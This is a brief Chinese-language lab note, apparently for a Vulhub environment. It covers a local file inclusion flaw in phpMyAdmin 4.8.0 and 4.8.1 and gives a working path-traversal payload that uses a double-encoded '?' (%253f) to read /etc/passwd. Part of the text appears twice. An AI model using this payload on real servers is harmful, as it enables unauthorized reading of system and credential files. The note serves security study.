受影响版本
phpMyAdmin 4.8.0和4.8.1
环境
Vulhub - Docker-Compose file for vulnerability environment
漏洞利用
?target=db_sql.php%253f/../../../../../../../../etc/passwd
因为`%253f`二次url解码后是`?`,整体变成
?target=db_sql.php?/../../../../../../../../etc/passwd
phpMyAdmin 4.8.0和4.8.1
Vulhub - Docker-Compose file for vulnerability environment
?target=db_sql.php%253f/../../../../../../../../etc/passwd
因为`%253f`二次url解码后是`?`,整体变成
?target=db_sql.php?/../../../../../../../../etc/passwd